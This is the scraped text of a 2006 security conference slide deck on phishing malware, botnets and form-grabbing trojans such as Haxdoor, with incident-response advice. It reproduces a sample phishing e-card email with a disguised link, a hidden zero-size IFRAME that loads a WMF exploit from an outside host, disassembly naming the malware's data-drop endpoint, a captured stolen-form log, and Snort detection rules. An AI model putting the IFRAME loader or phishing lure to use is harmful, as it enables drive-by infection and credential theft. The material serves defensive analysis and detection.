Upload
paulina-willis
View
217
Download
0
Tags:
Embed Size (px)
Citation preview
For Distribution Copyright 2006 Secure Science Corp. 1
Trojans & Botnets & Malware, Oh My!
Shmoocon ‘06Shmoocon ‘06Lance JamesLance James
Secure Science CorporationSecure Science Corporation
For Distribution Copyright 2006 Secure Science Corp. 2
What this talk is about?What this talk is about?
MalwareMalware In regards to incident responseIn regards to incident response Pre-emptive TechniquesPre-emptive Techniques Research & DevelopmentResearch & Development Related mainly to theft-intended Related mainly to theft-intended
malwaremalware What is Malware?What is Malware?
Malicious Software/HardwareMalicious Software/Hardware Designed to be harmfulDesigned to be harmful
For Distribution 3Copyright 2006 Secure Science Corp.
High
Low
1980 1985 1990 1995 2000+
password guessing
self-replicating code
password cracking
exploiting known vulnerabilities
disabling audits
back doors
hijacking sessions
sweepers
sniffers
packet spoofing
GUIautomated probes/scans
denial of service
www attacks
Tools
Attackers
IntruderKnowledge
AttackSophistication
“stealth” / advanced scanning techniques
burglaries
network mgmt. diagnostics
distributedattack tools
Cross site scripting
Stagedattack
Cyber Attack SophisticationCyber Attack SophisticationContinues To EvolveContinues To Evolve
bots
Source: CERT
For Distribution 4Copyright 2006 Secure Science Corp.
And Continue To And Continue To Grow…Grow…
Data theft grew more than 650%
over the past 3 years — CSI/FBI
137,000
security incidents in 2003, nearly twice as
many as in 2002
— CERT
Avg reported loss from attacks was $2.7M per
incident — CSI/FBI survey
85%of respondentshad breaches
— CSI/FBI survey85%
of the critical infrastructure is
owned or operated by the private sector
Source : Carnegie Mellon
For Distribution 5Copyright 2006 Secure Science Corp.
Growth Or Liability?Growth Or Liability? Over twenty per cent of Internet Over twenty per cent of Internet
users now access online banking users now access online banking services.services. This total will reach 33% by 2006, This total will reach 33% by 2006,
according to The Online Banking Report. according to The Online Banking Report. By 2010, over 55 million US households By 2010, over 55 million US households
will use online banking and ePayments will use online banking and ePayments services, which are tipped as "growth services, which are tipped as "growth areas". areas".
Wamu buys Providian, BofA buys MBNAWamu buys Providian, BofA buys MBNA And so what about the ‘And so what about the ‘PhishingPhishing’ ’
threat to e-commerce?threat to e-commerce?Source: ePaynews
For Distribution 6Copyright 2006 Secure Science Corp.
What Is Phishing?What Is Phishing? PhishingPhishing,, also referred to as also referred to as brand spoofingbrand spoofing, ,
as it is a variation on “fishing,” the idea being that as it is a variation on “fishing,” the idea being that bait is thrown out with the hopes that while most bait is thrown out with the hopes that while most will ignore the bait, some will be tempted into will ignore the bait, some will be tempted into biting. biting. Phishing is the act of sending a communication to a user Phishing is the act of sending a communication to a user
falsely claiming to be an established legitimate falsely claiming to be an established legitimate enterprise in an attempt to scam the user into enterprise in an attempt to scam the user into surrendering private information that will be used for surrendering private information that will be used for identity theft. identity theft.
The communication (usually email) directs the user to The communication (usually email) directs the user to visit a visit a Web siteWeb site where they are asked to update personal where they are asked to update personal information, such as passwords and credit card, social information, such as passwords and credit card, social security, and bank account numbers, that the legitimate security, and bank account numbers, that the legitimate organization already has. organization already has.
The Web site, however, is bogus or hostile and set up The Web site, however, is bogus or hostile and set up only to steal the user’s information. only to steal the user’s information.
For Distribution 7Copyright 2006 Secure Science Corp.
What’s Worse?What’s Worse? Email Phish or Phishing Malware?Email Phish or Phishing Malware?
Some of the larger phishing groups have Some of the larger phishing groups have associations with both phishing emails associations with both phishing emails and key-logging malware. and key-logging malware.
While phishing email is very effective, While phishing email is very effective, the number of victims is significantly the number of victims is significantly smaller than the victims of phishing smaller than the victims of phishing malware. malware.
Logs recovered from base camps for Logs recovered from base camps for phishing emails and malware show a phishing emails and malware show a startling difference.startling difference.
For Distribution 8Copyright 2006 Secure Science Corp.
Email –vs- MalwareEmail –vs- Malware
A single key logging Trojan can generate hundreds of megabytes of data in a week. The data is not processed by hand. Instead, scripts are used to filter the information. Potentially valuable information is frequently ignored due to the filtering process.
Each victim = < 500 bytes of data.1 week = < 50Kbytes. A single person can process the data in
minutes.
Volume of data generated
Account login, or credit card number with expiration and address.
Generally, a single victim only loses a single amount of information. Few victims lose more than one type of information. And the information compromised may not match the information desired by the phisher.
Name, address, phone, SSN, credit card, VCC2, bank account numbers, logins and passwords, and even items such as mother’s maiden name or the answer to the “forgot your password” prompt.
Generally, victims provide all of the information asked.
Type of information compromised
500,000100Average number of accounts compromised in a week
Phishing Malware / KeyloggersPhishing Emails
For Distribution 9Copyright 2006 Secure Science Corp.
Email –vs- Malware Email –vs- Malware (cont.)(cont.)
A single malware system, including Trojan and receiving server, may take months to develop. Each variant may take a week or longer to develop. When generic anti-virus signatures appear, redevelopment may take weeks or months.
A single phishing server may take one week to develop. The server may then be applied to hundreds of blind drop servers and reused for weeks or longer. Changes to the phishing email content (bait) can be measured in hours and may not need a change to the phishing server.
Total development cost to the phishers?
Most malware is effective for a week before anti-virus vendors develop signatures.
Some phishing groups use malware in limited distributions. While these programs may exist for much longer durations, they generally collect less information.
A single person that is infected may compromise the same information multiple times.
Reused regularly for weeks or months before requiring a change. Due to simple changes in the mailing list, a variety of people can be solicited – information is almost never collected from the same person twice.
How often is the method viable?
Phishing Malware / Key loggersPhishing Emails
For Distribution 10Copyright 2006 Secure Science Corp.
Phishing Malware Phishing Malware (cont.)(cont.)
In November of 2003, the concept of In November of 2003, the concept of a single mega-virus changed. a single mega-virus changed. Gaobot, followed by Sasser and Berbew, Gaobot, followed by Sasser and Berbew,
took a different tact: rather than one took a different tact: rather than one mega-worm, these consisted of hundreds mega-worm, these consisted of hundreds of variants – each slightly different. of variants – each slightly different.
The goal of the variant was not to The goal of the variant was not to become a mega-worm, but rather to become a mega-worm, but rather to infect a small group of systems. infect a small group of systems.
For Distribution 11Copyright 2006 Secure Science Corp.
Phishing Malware Phishing Malware (cont.)(cont.)
This approach provided two key benefits to the This approach provided two key benefits to the malware authors:malware authors:
Limited distribution; limited detectionLimited distribution; limited detection.. As long as As long as the malware is not widespread, the anti-virus vendors the malware is not widespread, the anti-virus vendors would be less likely to detect the malware. (If Norton would be less likely to detect the malware. (If Norton doesn’t know about a virus, then they cannot create a doesn’t know about a virus, then they cannot create a detection signature for the virus.) detection signature for the virus.)
Over the last 12 months Secure Science Corporation has Over the last 12 months Secure Science Corporation has identified dozens of virus variants used by phishers, identified dozens of virus variants used by phishers, carders, and generic malware authors that are not carders, and generic malware authors that are not detected by anti-virus software.detected by anti-virus software.
Rapid deploymentRapid deployment.... Nearly a hundred variants of Nearly a hundred variants of Sasser were identified in less than three months. Sasser were identified in less than three months. Each variant requires a different detection signature. Each variant requires a different detection signature. The rapid modification and deployment ensures that The rapid modification and deployment ensures that anti-virus vendors will overtax their available anti-virus vendors will overtax their available resources, becoming less responsive to new strains. resources, becoming less responsive to new strains. It also ensures that some variants will not be It also ensures that some variants will not be detected.detected.
For Distribution 12Copyright 2006 Secure Science Corp.
Phishing Malware Phishing Malware (cont.)(cont.)
We’re seeing a significant increase in We’re seeing a significant increase in malware used by phishing groups.malware used by phishing groups. IE exploitation via ActiveX Blended IE exploitation via ActiveX Blended
ThreatsThreats Let’s take a closer look at the malware, Let’s take a closer look at the malware,
and the threat model behind phishers and the threat model behind phishers and their malware.and their malware.
Malware key-logging mythsMalware key-logging myths
For Distribution 13Copyright 2006 Secure Science Corp.
Phishing Malware Phishing Malware (cont.)(cont.)
A few phishing groups have been A few phishing groups have been associated with specific malware.associated with specific malware. The malware is used for a variety of The malware is used for a variety of
purposes:purposes: Compromising hosts for operating the Compromising hosts for operating the
phishing server;phishing server; Compromising hosts for relaying the bulk Compromising hosts for relaying the bulk
mailing;mailing; Directly attacking clients with key-logging Directly attacking clients with key-logging
software.software.
A single piece of malware may serve A single piece of malware may serve any or all of these purposes.any or all of these purposes.
For Distribution 14Copyright 2006 Secure Science Corp.
Malware TrendsMalware Trends In early 2004, the malware associated with In early 2004, the malware associated with
phishing groups rarely appeared to be created phishing groups rarely appeared to be created specifically for phishing. Instead, was focused on specifically for phishing. Instead, was focused on botnet* attributes:botnet* attributes:
Email relayEmail relay.. The software opens network services that can The software opens network services that can be used to relay email anonymously. This is valuable to be used to relay email anonymously. This is valuable to phishers, and spammers in general.phishers, and spammers in general.
Data miningData mining.. The malware frequently contains built-in The malware frequently contains built-in functions for gathering information from the local system. functions for gathering information from the local system. The gathering usually focuses on software licenses (for The gathering usually focuses on software licenses (for game players , warez, or serialz dealersgame players , warez, or serialz dealers****) and Internet ) and Internet Explorer cache. The latter may contain information such as Explorer cache. The latter may contain information such as logins. For phishers, this type of data mining primarily logins. For phishers, this type of data mining primarily focuses on account logins to phishing targets.focuses on account logins to phishing targets.
* * A compromised system with remote control capabilities is a “bot”. A compromised system with remote control capabilities is a “bot”. A “botnet” is a collection of these compromised hosts. A “botnet” is a collection of these compromised hosts.
**** Illegally distributed software applications (warez) and the Illegally distributed software applications (warez) and the associated license keys (serialz) are frequently available and associated license keys (serialz) are frequently available and propagated through the underground software community.propagated through the underground software community.
For Distribution 15Copyright 2006 Secure Science Corp.
Malware Trends Malware Trends (cont.)(cont.)
Remote controlRemote control. The malware usually has . The malware usually has backdoor capabilities. This permits a remote backdoor capabilities. This permits a remote user to control and access the compromised user to control and access the compromised host. For a phisher, there is little advantage host. For a phisher, there is little advantage to having a backdoor to a system unless they to having a backdoor to a system unless they plan to use the server for hosting a phishing plan to use the server for hosting a phishing site. But for other people, such as virus site. But for other people, such as virus writers or botnet farmerswriters or botnet farmers**, remote control is , remote control is an essential attributean essential attribute..
* * A “botnet farmer” is an individual or group that A “botnet farmer” is an individual or group that manages and maintains one or more botnets. The manages and maintains one or more botnets. The botnet farmers generate revenue by selling systems or botnet farmers generate revenue by selling systems or CPU time to other people. Essentially, the botnet CPU time to other people. Essentially, the botnet becomes a large timeshare computer network.becomes a large timeshare computer network.
For Distribution 16Copyright 2006 Secure Science Corp.
Malware Trends Malware Trends (cont.)(cont.)
By Q3 of 2004, a few, large phishing By Q3 of 2004, a few, large phishing groups had evolved to support their groups had evolved to support their own specific malware.own specific malware. While the malware did contain email While the malware did contain email
relays, data mining functions, and relays, data mining functions, and remote control services, these had been remote control services, these had been tuned to support phishing specifically. tuned to support phishing specifically.
Viruses such as W32.Spybot.Worm Viruses such as W32.Spybot.Worm included specific code to harvest bank included specific code to harvest bank information from compromised hosts.information from compromised hosts.
For Distribution 17Copyright 2006 Secure Science Corp.
Malware Trends Malware Trends (cont.)(cont.)
A few phishing groups also appeared A few phishing groups also appeared associated with key logging software. associated with key logging software. While not true “key logging”, these While not true “key logging”, these
applications capture data submitted applications capture data submitted (posted) to web servers.(posted) to web servers.
A true key logger would generate massive A true key logger would generate massive amounts of data and would be difficult for an amounts of data and would be difficult for an automated system to identify account and automated system to identify account and login information.login information.
For Distribution 18Copyright 2006 Secure Science Corp.
Malware Trends Malware Trends (cont.)(cont.)
Instead, these applications hook into Instead, these applications hook into Internet Explorer’s (IE) form Internet Explorer’s (IE) form submission system.submission system. All data from the submitted form is All data from the submitted form is
relayed to a blind drop operated by the relayed to a blind drop operated by the phishers. phishers.
The logs contain information about the The logs contain information about the infected system, as well as the URL and infected system, as well as the URL and submitted form values. submitted form values.
More importantly, the malware More importantly, the malware intercepts the data before it enters any intercepts the data before it enters any secure network tunnel, such as SSL or secure network tunnel, such as SSL or HTTPS.HTTPS.
For Distribution 19Copyright 2006 Secure Science Corp.
Malware Trends Malware Trends (cont.)(cont.)
Examples of data output:Examples of data output: Recent examples of HaxDoor, Berbew Recent examples of HaxDoor, Berbew
and PWS.Banker reveal similar and PWS.Banker reveal similar “Formgrabbing”“Formgrabbing”
reason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&froreason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&from=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&m=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&state=MA&pc=*******state=MA&pc=*******
onlineid.bankofamerica.com/cgi-bin/sso.login.controlleronlineid.bankofamerica.com/cgi-bin/sso.login.controller [11023586123662948896][11023586123662948896] [IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32][IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32]
Distributed through IE Class-ID attacksDistributed through IE Class-ID attacks ADB/CHMADB/CHM IFRAME TAGIFRAME TAG Javaprxy???Javaprxy???
For Distribution 20Copyright 2006 Secure Science Corp.
Side-Bar, Case ExampleSide-Bar, Case Example
Anti-Malware Snake-OilAnti-Malware Snake-Oil Virtual KeyboardsVirtual Keyboards Key-board Logging ProtectionKey-board Logging Protection Scramble PadsScramble Pads Anti-Spyware Desktop softwareAnti-Spyware Desktop software
99% of Information Theft Malware 99% of Information Theft Malware
doesn’t log key strokes! (it’s doesn’t log key strokes! (it’s
unscalable)unscalable)
For Distribution 21Copyright 2006 Secure Science Corp.
Side-Bar, Case Example Side-Bar, Case Example (cont)(cont)
For Distribution 22Copyright 2006 Secure Science Corp.
Malware Trends Malware Trends (cont.)(cont.)
The end of 2004 showed a significant modification The end of 2004 showed a significant modification to the malware used by some phishing groupsto the malware used by some phishing groups. . The prior key logging systems generated gigabytes of The prior key logging systems generated gigabytes of
data in a very short time. This made data mining data in a very short time. This made data mining difficult, since only a few sites were of interest to the difficult, since only a few sites were of interest to the phishers. phishers.
By the end of 2004 and into 2005, the phishers had By the end of 2004 and into 2005, the phishers had evolved their software. evolved their software.
Loggers focus on specific URLs, such as the web logins to Loggers focus on specific URLs, such as the web logins to Citibank and Bank of America. Citibank and Bank of America.
It is believed that this was intended to pre-filter the data It is believed that this was intended to pre-filter the data collected by the malware. Rather than collecting all of the collected by the malware. Rather than collecting all of the submitted data, only submitted data of interest was submitted data, only submitted data of interest was collected. collected.
More importantly, multiple viruses appeared with this More importantly, multiple viruses appeared with this capability – indicating that multiple phishing groups evolved capability – indicating that multiple phishing groups evolved at the same time. This strongly suggests that malware at the same time. This strongly suggests that malware developers associated with phishers are in communication developers associated with phishers are in communication or have a common influencing source.or have a common influencing source.
For Distribution 23Copyright 2006 Secure Science Corp.
Malware Trends Malware Trends (cont.)(cont.)
PG02 significant attack pattern identifiedPG02 significant attack pattern identified Cpanel (WebISP in a box) exploitationCpanel (WebISP in a box) exploitation
System compromiseSystem compromise Payload launchPayload launch www.site.com/images/newex.htmlwww.site.com/images/newex.html
Hijacks Network or Box for SpammingHijacks Network or Box for Spamming Sending SpamSending Spam Uses DMS generation 2Uses DMS generation 2 Enabling anonymityEnabling anonymity
Uses Dark IP space for forged receive headerUses Dark IP space for forged receive header Object Class Exploits for IEObject Class Exploits for IE
Trojan Downloader payloadTrojan Downloader payload Classifies malware as “MSITS.exe”Classifies malware as “MSITS.exe”
Reference to MS-ITS protocol attacksReference to MS-ITS protocol attacks Uses GPL code from Uses GPL code from www.edup.tudelft.nl/~bjwever/www.edup.tudelft.nl/~bjwever/ Berend-Jan Wever websiteBerend-Jan Wever website
For Distribution 24Copyright 2006 Secure Science Corp.
Malware Trends Malware Trends (cont.)(cont.)
Object Class attacks not “brand new”Object Class attacks not “brand new” Uses older ADB Exploit even though newer attacks existUses older ADB Exploit even though newer attacks exist January-February 2005 haxdoor variants existed on for January-February 2005 haxdoor variants existed on for
win98win98 Suggests targeting “End of Life” productSuggests targeting “End of Life” product Win98 EOL on security upgradesWin98 EOL on security upgrades
No education on phishingNo education on phishing No SP2, built in pop-up blockersNo SP2, built in pop-up blockers
Evolutionary patternEvolutionary pattern Suggests Path of Least ResistanceSuggests Path of Least Resistance Evolve when necessaryEvolve when necessary Win98 is plentiful and best target!Win98 is plentiful and best target! Why Move??Why Move??
For Distribution 25Copyright 2006 Secure Science Corp.
Latest ThreatsLatest Threats WMF exploitWMF exploit
Discovered by Dan Hubbard (WebSense)Discovered by Dan Hubbard (WebSense) Found in the wild as a 0-dayFound in the wild as a 0-day Phishers were using it from Day 0Phishers were using it from Day 0 It was supposed to be patched in NovemberIt was supposed to be patched in November
MS05-053MS05-053 Nuclear Grabber used by Phishing Group Nuclear Grabber used by Phishing Group
#02#02 Written by Corpse (Author of A-311 Death and Written by Corpse (Author of A-311 Death and
Nuclear Grabber)Nuclear Grabber) AV Vendors call it HaxdoorAV Vendors call it Haxdoor
Sells software on Corpsespyware.net from Sells software on Corpsespyware.net from $250.00 to $2500.00$250.00 to $2500.00
Russian sales onlyRussian sales only
For Distribution 26Copyright 2006 Secure Science Corp.
Phishing Trends Phishing Trends (cont.)(cont.)
Serial Pattern for process of HaxdoorSerial Pattern for process of Haxdoor Successor to Berbew malware from 2004Successor to Berbew malware from 2004 Very likely relation to original Berbew authorsVery likely relation to original Berbew authors ’’05 Berbew marked with Corpse’s Signature05 Berbew marked with Corpse’s Signature Haxdoor malware written in AssemblyHaxdoor malware written in Assembly Trojan Creation KitTrojan Creation Kit Compiles with permutationsCompiles with permutations Packed with FSGPacked with FSG Easy for Phishers to compile on the fly with customized Easy for Phishers to compile on the fly with customized
Settings.Settings.
For Distribution 27Copyright 2006 Secure Science Corp.
Latest ThreatsLatest Threats
For Distribution 28Copyright 2006 Secure Science Corp.
Email from Phishing Group for WMF exploitEmail from Phishing Group for WMF exploit
Dear Friend, Dear Friend,
Friends [ Friends [ fromfriendsfromfriends at at aol.comaol.com ] has sent you an e-card from ] has sent you an e-card from
<A href="http://123Greetings.com">123Greetings.com</A> . <A href="http://123Greetings.com">123Greetings.com</A> .
<A href="http://123Greetings.com">123Greetings.com</A> is all about touching <A href="http://123Greetings.com">123Greetings.com</A> is all about touching lives, bridging distances, healing rifts and building bonds. We have a gallery of e-lives, bridging distances, healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of life. Express yourself to your friends and family cards for almost every occasion of life. Express yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words and music.by sending Free e-cards from our site with your choice of colors, words and music.
Your e-card will be available with us for the next 30 days. If you wish to keep the e-Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may save it on your computer or take a print. card longer, you may save it on your computer or take a print.
To view your e-card, choose from any of the following options: To view your e-card, choose from any of the following options:
<a href=<a href=http://www.123greetings.com/NY2006z3http://www.123greetings.com/NY2006z3 target=_blank><table><tr><td><a href="target=_blank><table><tr><td><a href="http://http://mujergorda.bitacoras.com/base/index.htmlmujergorda.bitacoras.com/base/index.html"">>http://www.123greetings.com/NY2006z3</tdhttp://www.123greetings.com/NY2006z3</td></tr></table></a> ></tr></table></a>
Latest ThreatsLatest Threats
For Distribution 29Copyright 2006 Secure Science Corp.
Identify the Threat, Label it - Here’s their Identify the Threat, Label it - Here’s their analysisanalysis
What AV does with this?What AV does with this?
For Distribution 30Copyright 2006 Secure Science Corp.
Problem exists hereProblem exists here Labeled Low Threat based on AV metricsLabeled Low Threat based on AV metrics Shoved in with the rest of the Trojan.small.emShoved in with the rest of the Trojan.small.em No known resolve other than desktop preventionNo known resolve other than desktop prevention
Very reactive, (as we all know)Very reactive, (as we all know) Evolving malware disables AV (common Evolving malware disables AV (common
knowledge)knowledge) How do we change this?How do we change this?
Change the AV metricChange the AV metric Use common senseUse common sense Proactive, not reactiveProactive, not reactive Serial Pattern analysis w/ common sense is keySerial Pattern analysis w/ common sense is key
Problem?Problem?
For Distribution 31Copyright 2006 Secure Science Corp.
Incident ResponseIncident Response Emerging ThreatsEmerging Threats
Management by ObjectiveManagement by Objective Per incident basisPer incident basis Threat modelling necessary (but usually Threat modelling necessary (but usually
never happens)never happens) Malware author groupingMalware author grouping
Serial PatternSerial Pattern Pre-emptive SignaturesPre-emptive Signatures
Forces them to evolve (ROI lowers)Forces them to evolve (ROI lowers) Possible ApprehensionPossible Apprehension
For Distribution 32Copyright 2006 Secure Science Corp.
R&D + IR=ProactiveR&D + IR=Proactive Research for Research for HaxdoorHaxdoor
<IFRAME src="<IFRAME src="http://http://imkportedoor.com/images/ny.wmfimkportedoor.com/images/ny.wmf"" frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no> </IFRAME> width=0 height=0 scrolling=no> </IFRAME>
Grabs msits.exe from Grabs msits.exe from www.site.com/images/msits.exewww.site.com/images/msits.exe Packed with FSG (marked with Corpse Signature within Packing)Packed with FSG (marked with Corpse Signature within Packing)
003C1BD1 PUSH ies4dll.003C1165 ASCII 003C1BD1 PUSH ies4dll.003C1165 ASCII www.pcpeek-webcam-sex.comwww.pcpeek-webcam-sex.com
003C1BE0003C1BE0 PUSH ies4dll.003C11C9 ASCII "images/data.php“PUSH ies4dll.003C11C9 ASCII "images/data.php“
Blind drop IdentifiedBlind drop Identified Data recovered in realtimeData recovered in realtime
Phishing the PhishersPhishing the Phishers
For Distribution 33Copyright 2006 Secure Science Corp.
Data RecoveryData Recovery
For Distribution 34Copyright 2006 Secure Science Corp.
Impact DOAImpact DOA Blind drop log monitoringBlind drop log monitoring
Data returned to institution that’s compromisedData returned to institution that’s compromised Real-time risk mitigationReal-time risk mitigation
Pre-emptive ActionPre-emptive Action What do we know?What do we know?
Packed with FSGPacked with FSG How many non-malicious executables are packed with How many non-malicious executables are packed with
FSGFSG Talks to /images/data.php Talks to /images/data.php Some versions /images/dat7.php and /images/bsrv.phpSome versions /images/dat7.php and /images/bsrv.php Group titles it msits.exe and msys.exeGroup titles it msits.exe and msys.exe Bleeding-Edge SnortBleeding-Edge Snort alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE
Corpsepsyware.net - PG 02 Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 Corpsepsyware.net - PG 02 Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;) reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02 Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 Corpsespyware.net - PG 02 Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;) reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;)
For Distribution 35Copyright 2006 Secure Science Corp.
OutcomeOutcome Snort SigsSnort Sigs
Prevent a large amount of new phishing Prevent a large amount of new phishing malwaremalware
Corpse has to change his methodCorpse has to change his method Many other phishing malware packed same wayMany other phishing malware packed same way
Problem response vs Incident Problem response vs Incident ResponseResponse Look at overall problemLook at overall problem
Example:Example: Form GrabbingForm Grabbing Assume everyone is infectedAssume everyone is infected How do we solve this?How do we solve this?
For Distribution 36Copyright 2006 Secure Science Corp.
Example: Form GrabbingExample: Form Grabbing
For Distribution 37Copyright 2006 Secure Science Corp.
So you’re not a RCESo you’re not a RCE Tricks for IRTricks for IR
IEHTTPHEADERSIEHTTPHEADERS BHO and IE hooksBHO and IE hooks Uses IE as AgentUses IE as Agent Locate Blind DropLocate Blind Drop
Monitor and MitigateMonitor and Mitigate VMWareVMWare
Sandbox (with snapshots)Sandbox (with snapshots) Tools like sysinternals, Ollydbg, winpoochTools like sysinternals, Ollydbg, winpooch Joe Stewart has some new tools for sandnetJoe Stewart has some new tools for sandnet
As it becomes more prevalentAs it becomes more prevalent More tools available for the common response More tools available for the common response
teamteam Common sense is sometimes the best weaponCommon sense is sometimes the best weapon
For Distribution 38Copyright 2006 Secure Science Corp.
Contact InfoContact Info
Secure Science CorporationSecure Science Corporation
7770 Regents Rd.7770 Regents Rd.
Suite 113-535Suite 113-535
San Diego, CA. 92122-1967San Diego, CA. 92122-1967
(877)570-0455(877)570-0455
http://www.securescience.nethttp://www.securescience.net
Email: Email: [email protected]@securescience.net
Lance James ~ CTOLance James ~ CTO
For Distribution 39Copyright 2006 Secure Science Corp.
QuestionsQuestions